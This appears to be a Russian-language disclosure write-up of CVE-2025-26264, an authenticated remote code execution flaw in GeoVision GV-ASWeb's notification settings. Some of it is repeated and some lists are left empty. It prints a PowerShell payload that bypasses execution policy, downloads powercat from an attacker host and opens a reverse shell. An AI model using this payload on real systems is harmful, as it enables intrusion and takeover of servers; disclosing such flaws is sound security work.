
CVE-2025-26264 — GeoVision GV-ASWeb версии 6.1.2.0 или ниже содержит уязвимость удалённого выполнения кода (RCE) в функции Notification Settings. Аутентифицированный злоумышленник с привилегиями «System Settings» в ASWeb может использовать эту ошибку для выполнения произвольных команд на сервере, что приводит к полной компрометации системы.
CVE-2025-26264 — GeoVision GV-ASWeb версии 6.1.2.0 или ниже содержит уязвимость удалённого выполнения кода (RCE) в функции «Настройки уведомлений» (Notification Settings). Аутентифицированный злоумышленник с привилегиями «Системные настройки» в ASWeb может использовать эту уязвимость для выполнения произвольных команд на сервере, что приводит к полной компрометации системы.
Для успешной атаки злоумышленнику необходимы:
Уязвимость может быть использована для выполнения следующих несанкционированных действий:
Эксплуатация уязвимости удалённого выполнения кода в платформе ASWeb GeoVision GV-ASManager возможна на версиях 6.1.2.0 или ниже (исправление отсутствует по состоянию на 26 февраля 2025 года).
Функция Notification Setting в ASWeb GeoVision ASManager уязвима к RCE
HTTP-запрос на настройку уведомления о конкретном событии: неудачная попытка входа в TAWeb
Согласно этому скрипту, при неудачной попытке входа в TAWeb будет выполнен следующий сценарий PowerShell:
powershell.exe Set-ExecutionPolicy Bypass -Force;IEX(New-Object System.Net.WebClient).DownloadString('http://LHOST/powercat.ps1');powercat -c LHOST -p LPORT -e powershell
Неудачная попытка аутентификации в TAWeb
Хост жертвы: скрипт открывает бэкдор на хост злоумышленника.
Хост злоумышленника: злоумышленник получает shell
Если у вас есть вопрос, вы можете связаться со мной, Giorgi Dograshvili, в LinkedIn.